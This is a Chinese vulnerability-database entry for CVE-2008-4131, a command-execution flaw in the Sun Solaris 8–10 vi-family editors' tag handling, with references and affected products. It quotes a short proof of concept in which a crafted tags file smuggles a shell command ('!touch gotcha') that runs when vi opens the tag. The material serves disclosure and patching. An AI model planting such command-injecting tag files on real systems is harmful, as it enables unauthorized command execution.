Sun Solaris多个未明漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116128 漏洞类型 权限许可和访问控制
发布时间 2008-09-17 更新时间 2008-10-03
CVE编号 CVE-2008-4131 CNNVD-ID CNNVD-200809-262
漏洞平台 Solaris CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/32393
https://www.securityfocus.com/bid/31229
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-262
|漏洞详情
SunSolaris8至10存在多个未明漏洞。本地用户可以借助"-t"选项中的标签处理有关的向量以及(a)vi,(b)ex,(c)vedit,(d)view,和(e)edit程序中与":tag"命令有关的向量,获取特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/31229/info

Sun Solaris text editors are prone to a command-execution vulnerability.

An attacker may leverage this issue to execute arbitrary commands with the privileges of another user on the affected computer.

Sun Solaris 8, 9, and 10 are affected. 

$ echo "This is line 1" > file1
$ echo "file1line1<TAB>file1<TAB>:1|!touch gotcha" > tags
$ ls
file1   tags
$ vi -t file1line1
:q!
$ ls
file1   gotcha   tags
$
|受影响的产品
Sun Solaris 9_x86 Update 2 Sun Solaris 9 Sun Solaris 8_x86 Sun Solaris 8_sparc Sun Solaris 10_x86 Sun Solaris 10 Avaya Interactive Response 3.0
|参考资料

来源:SUNALERT
名称:237987
链接:http://sunsolve.sun.com/search/document.do?assetkey=1-26-237987-1
来源:XF
名称:solaris-tagfiles-code-execution(45218)
链接:http://xforce.iss.net/xforce/xfdb/45218
来源:BID
名称:31229
链接:http://www.securityfocus.com/bid/31229
来源:VUPEN
名称:ADV-2008-2614
链接:http://www.frsirt.com/english/advisories/2008/2614
来源:support.avaya.com
链接:http://support.avaya.com/elmodocs2/security/ASA-2008-387.htm
来源:SECTRACK
名称:1020898
链接:http://securitytracker.com/id?1020898
来源:SECUNIA
名称:31907
链接:http://secunia.com/advisories/31907
来源:SECUNIA
名称:31895
链接:http://secunia.com/advisories/31895
来源:OVAL
名称:oval:org.mitre.oval:def:5884
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:5884